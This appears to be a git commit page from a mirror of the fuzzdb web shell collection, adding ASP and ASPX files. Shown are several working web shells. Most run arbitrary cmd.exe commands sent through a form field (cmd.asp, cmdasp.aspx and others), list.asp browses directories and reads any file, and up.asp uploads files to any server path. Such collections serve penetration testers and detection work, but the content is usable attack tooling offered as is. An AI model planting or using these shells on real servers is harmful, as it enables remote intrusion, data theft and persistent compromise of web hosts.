fzuudb-webshell

2025-12-08 22:01:27 +00:00 · 2013-06-05 11:21:04 +08:00
parent 6a88226bfd
commit f06456a918
42 changed files with 5982 additions and 0 deletions
--- a/fuzzdb-webshell/asp/cmd-asp-5.1.asp
+++ b/fuzzdb-webshell/asp/cmd-asp-5.1.asp
@@ -0,0 +1,41 @@
+<%
+
+' ASP Cmd Shell On IIS 5.1
+' brett.moore_at_security-assessment.com 
+' http://seclists.org/bugtraq/2006/Dec/0226.html
+
+
+Dim oS,oSNet,oFSys, oF,szCMD, szTF
+On Error Resume Next
+Set oS = Server.CreateObject("WSCRIPT.SHELL")
+Set oSNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFSys = Server.CreateObject("Scripting.FileSystemObject")
+szCMD = Request.Form("C")
+If (szCMD <> "") Then
+  szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" &  oFSys.GetTempName()
+  ' Here we do the command
+  Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
+"""",0,True)
+  response.write szTF
+  ' Change perms
+  Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G
+everyone:F",0,True)
+  Set oF = oFSys.OpenTextFile(szTF,1,False,0)
+End If 
+%>
+<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
+<input type=text name="C" size=70 value="<%= szCMD %>">
+<input type=submit value="Run"></FORM><PRE>
+Machine: <%=oSNet.ComputerName%><BR>
+Username: <%=oSNet.UserName%><br>
+<% 
+If (IsObject(oF)) Then
+  On Error Resume Next
+  Response.Write Server.HTMLEncode(oF.ReadAll)
+  oF.Close
+  Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
+End If 
+
+%>
+
+<!--    http://michaeldaw.org   2006    -->
--- a/fuzzdb-webshell/asp/cmd.asp
+++ b/fuzzdb-webshell/asp/cmd.asp
@@ -0,0 +1,47 @@
+<!--
+
+ASP_KIT
+
+cmd.asp = Command Execution
+
+by: Maceo
+modified: 25/06/2003
+
+-->
+
+<%
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+
+szCMD = request("cmd")
+
+If (szCMD <> "") Then
+  szTempFile = "C:\" & oFileSys.GetTempName( )
+  Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+  Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
+  End If
+%>
+
+<HTML>
+<BODY>
+<FORM action="" method="GET">
+<input type="text" name="cmd" size=45 value="<%= szCMD %>">
+<input type="submit" value="Run">
+</FORM>
+<PRE>
+<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+<br>
+<%
+  If (IsObject(oFile)) Then
+    On Error Resume Next
+    Response.Write Server.HTMLEncode(oFile.ReadAll)
+    oFile.Close
+    Call oFileSys.DeleteFile(szTempFile, True)
+  End If
+%>
+</BODY>
+</HTML>
+
+
+
--- a/fuzzdb-webshell/asp/cmd.aspx
+++ b/fuzzdb-webshell/asp/cmd.aspx
@@ -0,0 +1,37 @@
+<%@ Page Language="VB" Debug="true" %>
+<%@ import Namespace="system.IO" %>
+<%@ import Namespace="System.Diagnostics" %>
+
+<script runat="server">      
+
+Sub RunCmd(Src As Object, E As EventArgs)            
+  Dim myProcess As New Process()            
+  Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)            
+  myProcessStartInfo.UseShellExecute = false            
+  myProcessStartInfo.RedirectStandardOutput = true            
+  myProcess.StartInfo = myProcessStartInfo            
+  myProcessStartInfo.Arguments=xcmd.text            
+  myProcess.Start()            
+
+  Dim myStreamReader As StreamReader = myProcess.StandardOutput            
+  Dim myString As String = myStreamReader.Readtoend()            
+  myProcess.Close()            
+  mystring=replace(mystring,"<","&lt;")            
+  mystring=replace(mystring,">","&gt;")            
+  result.text= vbcrlf & "<pre>" & mystring & "</pre>"    
+End Sub
+
+</script>
+
+<html>
+<body>    
+<form runat="server">        
+<p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>        
+<asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>        
+<p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>        
+<asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>        
+<p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>        
+<p><asp:Label id="result" runat="server"></asp:Label>       
+</form>
+</body>
+</html>
--- a/fuzzdb-webshell/asp/cmdasp.asp
+++ b/fuzzdb-webshell/asp/cmdasp.asp
@@ -0,0 +1,55 @@
+<%@ Language=VBScript %>
+<%
+  ' --------------------o0o--------------------
+  '  File:    CmdAsp.asp
+  '  Author:  Maceo <maceo @ dogmile.com>
+  '  Release: 2000-12-01
+  '  OS:      Windows 2000, 4.0 NT
+  ' -------------------------------------------
+
+  Dim oScript
+  Dim oScriptNet
+  Dim oFileSys, oFile
+  Dim szCMD, szTempFile
+
+  On Error Resume Next
+
+  ' -- create the COM objects that we will be using -- '
+  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+
+  ' -- check for a command that we have posted -- '
+  szCMD = Request.Form(".CMD")
+  If (szCMD <> "") Then
+
+    ' -- Use a poor man's pipe ... a temp file -- '
+    szTempFile = "C:\" & oFileSys.GetTempName( )
+    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+    Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
+
+  End If
+
+%>
+<HTML>
+<BODY>
+<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
+<input type=text name=".CMD" size=45 value="<%= szCMD %>">
+<input type=submit value="Run">
+</FORM>
+<PRE>
+<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+<br>
+<%
+  If (IsObject(oFile)) Then
+    ' -- Read the output from our command and remove the temp file -- '
+    On Error Resume Next
+    Response.Write Server.HTMLEncode(oFile.ReadAll)
+    oFile.Close
+    Call oFileSys.DeleteFile(szTempFile, True)
+  End If
+%>
+</BODY>
+</HTML>
+
+<!--    http://michaeldaw.org   2006    -->
--- a/fuzzdb-webshell/asp/cmdasp.aspx
+++ b/fuzzdb-webshell/asp/cmdasp.aspx
@@ -0,0 +1,42 @@
+<%@ Page Language="C#" Debug="true" Trace="false" %>
+<%@ Import Namespace="System.Diagnostics" %>
+<%@ Import Namespace="System.IO" %>
+<script Language="c#" runat="server">
+void Page_Load(object sender, EventArgs e)
+{
+}
+string ExcuteCmd(string arg)
+{
+ProcessStartInfo psi = new ProcessStartInfo();
+psi.FileName = "cmd.exe";
+psi.Arguments = "/c "+arg;
+psi.RedirectStandardOutput = true;
+psi.UseShellExecute = false;
+Process p = Process.Start(psi);
+StreamReader stmrdr = p.StandardOutput;
+string s = stmrdr.ReadToEnd();
+stmrdr.Close();
+return s;
+}
+void cmdExe_Click(object sender, System.EventArgs e)
+{
+Response.Write("<pre>");
+Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
+Response.Write("</pre>");
+}
+</script>
+<HTML>
+<HEAD>
+<title>awen asp.net webshell</title>
+</HEAD>
+<body >
+<form id="cmd" method="post" runat="server">
+<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
+<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
+<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
+</form>
+</body>
+</HTML>
+
+<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
+<!--    http://michaeldaw.org   04/2007    -->
--- a/fuzzdb-webshell/asp/list.asp
+++ b/fuzzdb-webshell/asp/list.asp
@@ -0,0 +1,79 @@
+<!--
+
+ASP_KIT
+
+list.asp = Directory & File View
+
+by: darkraver
+modified: 16/12/2005
+
+-->
+
+<body>
+<html>
+
+<%
+
+file=request("file")
+tipo=request("type")
+
+If file="" then
+	file="c:\"
+	tipo="1"
+End If
+
+%>
+
+
+<FORM action="" method="GET">
+<INPUT TYPE="text" NAME="file" value="<%=file%>">
+<INPUT TYPE="hidden" NAME="type" value="<%=tipo%>">
+<INPUT TYPE="submit" Value="Consultar">
+</FORM>
+
+
+<%
+
+If tipo="1" then
+    Response.Write("<h3>PATH: " & file & "</h3>")
+	ListFolder(file)
+End If
+
+If tipo="2" then
+    Response.Write("<h3>FILE: " & file & "</h3>")
+
+    Set oStr = server.CreateObject("Scripting.FileSystemObject")
+    Set oFich = oStr.OpenTextFile(file, 1)
+
+	Response.Write("<pre>--<br>")
+
+    Response.Write(oFich.ReadAll)
+
+    Response.Write("<br>--</pre>")
+
+End If
+%>
+
+<%
+
+sub ListFolder(path)
+
+	set fs = CreateObject("Scripting.FileSystemObject")
+	set folder = fs.GetFolder(path)
+
+	Response.Write("<br>( ) <a href=?type=1&file=" & server.URLencode(path) & "..\>" & ".." & "</a>" & vbCrLf)
+
+	for each item in folder.SubFolders
+		Response.Write("<br>( ) <a href=?type=1&file=" & server.URLencode(item.path) & "\>" & item.Name & "</a>" & vbCrLf)
+	next
+
+	for each item in folder.Files
+		Response.Write("<li><a href=?type=2&file=" & server.URLencode(item.path) & ">" & item.Name & "</a> - " & item.Size & " bytes, " & "</li>" & vbCrLf)
+	next
+
+end sub
+
+%>
+
+</body>
+</html>
--- a/fuzzdb-webshell/asp/list.txt
+++ b/fuzzdb-webshell/asp/list.txt
@@ -0,0 +1,79 @@
+<!--
+
+ASP_KIT
+
+list.asp = Directory & File View
+
+by: darkraver
+modified: 16/12/2005
+
+-->
+
+<body>
+<html>
+
+<%
+
+file=request("file")
+tipo=request("type")
+
+If file="" then
+	file="c:\"
+	tipo="1"
+End If
+
+%>
+
+
+<FORM action="" method="GET">
+<INPUT TYPE="text" NAME="file" value="<%=file%>">
+<INPUT TYPE="hidden" NAME="type" value="<%=tipo%>">
+<INPUT TYPE="submit" Value="Consultar">
+</FORM>
+
+
+<%
+
+If tipo="1" then
+    Response.Write("<h3>PATH: " & file & "</h3>")
+	ListFolder(file)
+End If
+
+If tipo="2" then
+    Response.Write("<h3>FILE: " & file & "</h3>")
+
+    Set oStr = server.CreateObject("Scripting.FileSystemObject")
+    Set oFich = oStr.OpenTextFile(file, 1)
+
+	Response.Write("<pre>--<br>")
+
+    Response.Write(oFich.ReadAll)
+
+    Response.Write("<br>--</pre>")
+
+End If
+%>
+
+<%
+
+sub ListFolder(path)
+
+	set fs = CreateObject("Scripting.FileSystemObject")
+	set folder = fs.GetFolder(path)
+
+	Response.Write("<br>( ) <a href=?type=1&file=" & server.URLencode(path) & "..\>" & ".." & "</a>" & vbCrLf)
+
+	for each item in folder.SubFolders
+		Response.Write("<br>( ) <a href=?type=1&file=" & server.URLencode(item.path) & "\>" & item.Name & "</a>" & vbCrLf)
+	next
+
+	for each item in folder.Files
+		Response.Write("<li><a href=?type=2&file=" & server.URLencode(item.path) & ">" & item.Name & "</a> - " & item.Size & " bytes, " & "</li>" & vbCrLf)
+	next
+
+end sub
+
+%>
+
+</body>
+</html>
--- a/fuzzdb-webshell/asp/ntdaddy.asp
+++ b/fuzzdb-webshell/asp/ntdaddy.asp
--- a/fuzzdb-webshell/asp/up.asp
+++ b/fuzzdb-webshell/asp/up.asp
@@ -0,0 +1,137 @@
+<!--
+
+ASP_KIT
+
+up.asp = File upload
+
+by: Unknown
+modified: 25/06/2003
+
+-->
+
+<%
+
+Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+
+%>
+
+<%
+Response.Buffer = true
+Function BuildUpload(RequestBin)
+     'Get the boundary
+     PosBeg = 1
+     PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(13)))
+     boundary = MidB(RequestBin,PosBeg,PosEnd-PosBeg)
+     boundaryPos = InstrB(1,RequestBin,boundary)
+     'Get all data inside the boundaries
+     Do until (boundaryPos=InstrB(RequestBin,boundary & getByteString("--")))
+          'Members variable of objects are put in a dictionary object
+          Dim UploadControl
+          Set UploadControl = CreateObject("Scripting.Dictionary")
+          'Get an object name
+          Pos = InstrB(BoundaryPos,RequestBin,getByteString("Content-Disposition"))
+          Pos = InstrB(Pos,RequestBin,getByteString("name="))
+          PosBeg = Pos+6
+          PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(34)))
+          Name = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
+          PosFile = InstrB(BoundaryPos,RequestBin,getByteString("filename="))
+          PosBound = InstrB(PosEnd,RequestBin,boundary)
+          'Test if object is of file type
+          If PosFile<>0 AND (PosFile<PosBound) Then
+               'Get Filename, content-type and content of file
+               PosBeg = PosFile + 10
+               PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(34)))
+               FileName = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
+               'Add filename to dictionary object
+               UploadControl.Add "FileName", FileName
+               Pos = InstrB(PosEnd,RequestBin,getByteString("Content-Type:"))
+               PosBeg = Pos+14
+               PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(13)))
+               'Add content-type to dictionary object
+               ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
+               UploadControl.Add "ContentType",ContentType
+               'Get content of object
+               PosBeg = PosEnd+4
+               PosEnd = InstrB(PosBeg,RequestBin,boundary)-2
+               Value = MidB(RequestBin,PosBeg,PosEnd-PosBeg)
+               Else
+               'Get content of object
+               Pos = InstrB(Pos,RequestBin,getByteString(chr(13)))
+               PosBeg = Pos+4
+               PosEnd = InstrB(PosBeg,RequestBin,boundary)-2
+               Value = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
+          End If
+          UploadControl.Add "Value" , Value
+          UploadRequest.Add name, UploadControl
+          BoundaryPos=InstrB(BoundaryPos+LenB(boundary),RequestBin,boundary)
+     Loop
+End Function
+%>
+
+<%
+Function getByteString(StringStr)
+     For i = 1 to Len(StringStr)
+          char = Mid(StringStr,i,1)
+          getByteString = getByteString & chrB(AscB(char))
+     Next
+End Function
+%>
+
+<%
+Function getString(StringBin)
+     getString =""
+     For intCount = 1 to LenB(StringBin)
+          getString = getString & chr(AscB(MidB(StringBin,intCount,1)))
+     Next
+End Function
+%>
+
+<%
+If request("ok")="1" then
+     Response.Clear
+     byteCount = Request.TotalBytes
+
+     RequestBin = Request.BinaryRead(byteCount)
+
+     Set UploadRequest = CreateObject("Scripting.Dictionary")
+
+     BuildUpload(RequestBin)
+
+     If UploadRequest.Item("fichero").Item("Value") <> "" Then
+
+          contentType = UploadRequest.Item("fichero").Item("ContentType")
+          filepathname = UploadRequest.Item("fichero").Item("FileName")
+          filename = Right(filepathname,Len(filepathname)-InstrRev(filepathname,"\"))
+          value = UploadRequest.Item("fichero").Item("Value")
+
+		  path = UploadRequest.Item("path").Item("Value")
+
+          filename = path & filename
+
+          Set MyFileObject = Server.CreateObject("Scripting.FileSystemObject")
+          Set objFile = MyFileObject.CreateTextFile(filename)
+
+          For i = 1 to LenB(value)
+               objFile.Write chr(AscB(MidB(value,i,1)))
+          Next
+          objFile.Close
+          Set objFile = Nothing
+          Set MyFileObject = Nothing
+     End If
+     Set UploadRequest = Nothing
+End If
+%>
+
+<HTML>
+<BODY>
+<FORM action="?ok=1" method="POST" ENCTYPE="multipart/form-data">
+<INPUT TYPE="file" NAME="fichero">
+<INPUT TYPE="submit" Value="Upload">
+<br>Target PATH:<br><INPUT TYPE="text" Name="path" Value="C:\">
+</FORM>
+<PRE>
+<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+<br>
+File: <%=filename%>
+</HTML>
+</BODY>